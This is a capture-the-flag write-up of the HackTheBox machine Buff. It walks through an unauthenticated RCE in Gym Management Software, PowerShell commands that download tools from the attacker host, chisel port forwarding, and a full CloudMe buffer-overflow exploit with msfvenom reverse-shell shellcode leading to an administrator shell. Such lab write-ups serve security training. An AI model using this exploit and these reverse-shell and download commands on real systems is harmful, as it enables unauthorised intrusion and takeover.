HTB: Buff
Posted on 22 Nov 2020 in security • 4 min read
This is a writeup about a retired HacktheBox machine: Buff published on July 18 2020 egotisticalSW This box is classified as an easy machine. The user part just require to exploit a CVE. The root part require first to pivot to access the box's internal services then exploit another CVE.
User
Recon
We start with an nmap scan. Despite being a Windows boxes, only a few services are exposed: A port 8080 for an HTTP service and a port 7680 (probably another HTB user port as we will see at the end of this writeup).
# Nmap 7.80 scan initiated Sat Jul 25 08:59:16 2020 as: nmap -p- -sSV -oN nmap 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.16s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
Web
The website is a promotional website for a Gym.
We browse the site and found the contact page. On it we can read that the site was "Made using Gym Management Software 1.0".
Despite the site looking like a homemade site for the purpose of the box, this is really a public product with a exploit available.
kali@kali:~$ searchsploit Gym Management
------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------ ---------------------------------
Gym Management System 1.0 - Unauthenticated RCE | php/webapps/48506.py
------------------------------------------------ ---------------------------------
We run the exploit, see who we are and get the user flag.
kali@kali:~$ python2 48506.py http://10.10.10.198:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>
C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun
C:\xampp\htdocs\gym\upload> type "C:\Users\shaun\Desktop\user.txt"
�PNG
�
6c675c6c581ec9341b8ed8717c537e32
root
We can use our limited shell to download exec from our kali box (running a simple python HTTP server) and execute them. For instance we can run winPEAS
C:\xampp\htdocs\gym\upload> powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.24:8080/winPEAS.exe', '.\winPEAS.exe')
C:\xampp\htdocs\gym\upload> .\winPEAS.exe
<SNIP>
Cloudme
Still browsing our user's folders we found an specific binary in Downloads:
CloudMe_1112.exe.
C:\xampp\htdocs\gym\upload> dir "C:\Users\Shaun\Downloads"
�PNG
�
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\Shaun\Downloads
14/07/2020 13:27 <DIR> .
14/07/2020 13:27 <DIR> ..
16/06/2020 16:26 17,830,824 CloudMe_1112.exe
1 File(s) 17,830,824 bytes
2 Dir(s) 9,639,174,144 bytes free
This also is a public software with some exploit available. For our specific version (1.11.2), only four exploits applies.
kali@kali:~$ searchsploit cloudme
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | windows/local/48499.txt
Cloudme 1.9 - Buffer Overflow (DEP) (Metasplo | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(D | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Over | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghu | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 ( | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) | windows_x86-64/remote/44784.py
---------------------------------------------- ---------------------------------
But as we saw earlier only the port 8080 is open on the box. The CloudMe
software is only running locally on the box. We need to use some pivoting
technique to access the internal box services in order to use the exploit
44470.py.
#######################################################
# Exploit Title: Local Buffer Overflow on CloudMe Sync v1.11.0
# Date: 08.03.2018
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1110.exe
# Category: Local
# Exploit Discovery: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 1.11.0
# Tested on: Windows 7 SP1 x86
# CVE: CVE-2018-7886
# Solution: Update CloudMe Sync to 1.11.2
#######################################################
#Disclosure Date: March 12, 2018
#Response Date: March 14, 2018
#Bug Fixed: April 12, 2018
# Run this file in victim's win 7 sp1 x86 system where CloudMe Sync 1.11.0 has been installed.
import socket
target="127.0.0.1"
junk="A"*1052
eip="\x7B\x8A\xA9\x68" #68a98a7b : JMP ESP - Qt5Core.dll
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f c
shellcode=( "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a\x0e\x18\x68"
"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")
payload=junk+eip+shellcode
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)
chisel
We will use chisel
in order to access CloudMe service.
On our kali we run chisel in server mode.
./chisel_1.6.0_linux_amd64 server -p 9001 -reverse
Using our limited shell we download our chisel binary on the box and run it as
client on port 8888 (remember this strange open port on the nmap scan?) as
CloudMe is also running on port 8888 (as stated on the exploit 44770.py).
C:\xampp\htdocs\gym\upload> powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.24:8080/chisel.exe', '.\chisel.exe')"
C:\xampp\htdocs\gym\upload> .\chisel.exe client 10.10.14.24:9001 R:8888:localhost:8888
The exploit 44770.py also told us to generate a new shellcode using
msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f c
We update the script with our shell code, configure the metasploit handler and
run it as well as the exploit script (with python 44470.py) . We got a shell as administrator and can
get the root flag.
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Command shell session 1 opened (10.10.14.24:4444 -> 10.10.10.198:53234) at 2020-07-25 12:07:33 -0400
whoami
whoami
buff\administrator
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
4ea57b2b8df4db2ea72531bcc50c5a86
Wrapping up
This box was really quick as it only require to exploit two CVE. The pivoting technique was an interesting complication for an easy HTB machine.